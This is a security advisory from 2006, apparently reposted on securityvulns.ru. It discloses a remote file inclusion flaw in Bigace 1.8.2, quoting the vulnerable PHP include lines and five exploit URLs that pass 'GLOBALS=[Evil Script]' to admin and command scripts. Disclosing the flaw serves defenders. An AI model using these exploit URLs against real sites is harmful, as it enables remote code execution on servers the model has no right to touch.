Computer Security

Security Advisory: Bigace 1.8.2 (GLOBALS) Remote File Inclusion
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA21648] Fotopholder "path" Cross-Site Scripting Vulnerability

  [Full-disclosure] [vuln.sg] Cybozu Garoon 2 SQL Injection Vulnerabilities

  [Full-disclosure] [vuln.sg] Cybozu Products Arbitrary File Retrieval Vulnerability

  eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability

From:vampire_chiristof_(at)_yahoo.com <vampire_chiristof_(at)_yahoo.com>
Date:28.08.2006
Subject:Bigace 1.8.2 (GLOBALS) Remote File Inclusion

Author : Vampire        

Location : Iran - Tehran

HomePage : http://www.hackerz.ir

Email : Vampire_chiristof[at]yahoo[dot]com

Critical Level : Dangerous

------------------------------------------------------------------------
---------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Bigace

version : 1.8.2

URL : http://Bigace.sourceforge.net

------------------------------------------------------------------------
---------------

Vulnerability:

~~~~~~~~~~~~~

in download.cmd.php , admin.cmd.php , upload_form.php We Found Vulnerability Script

----------------------------------------admin.cmd.php-----------------------
---------------

....

<?php

           require_once($GLOBALS['_BIGACE']['DIR']['admin
'].'styling.php');
           require_once($GLOBALS['_BIGACE']['DIR']['admin
'].'functions.inc.php');
           include_once($GLOBALS['_BIGACE']['DIR']['libs'
].'io.inc.php');
           

?>

...
----------------------------------------download.cmd.php-----------------------
---------------
....

<?php

           include_once($GLOBALS['_BIGACE']['DIR']['libs'
].'io.inc.php');
           

?>

...


----------------------------------------upload_form.php-----------------------
---------------
....

<?php

          require_once($GLOBALS['_BIGACE']['DIR']['admin'
].'include/mode_constants.php');
           

?>

...




----------------------------------------item_main.php-----------------------
---------------
....


<?php

         require_once($GLOBALS['_BIGACE']['DIR']['admin'
].'include/mode_constants.php');



?>

...



Exploit:

~~~~~~~


http://www.target.com/[Bigace]/system/admin/include/item_main.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/admin/include/upload_form.
php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/command/admin.cmd.php?GLOBALS=[Evil Script]

Solution:

~~~~~~~~

Sanitize Variabel $GLOBALS in download.cmd.php , admin.cmd.php , item_main.php , upload_form.php

------------------------------------------------------------------------
----------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friends Cephexin , Sh3ll , MFOX , Alijbs and All Real Hackers
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru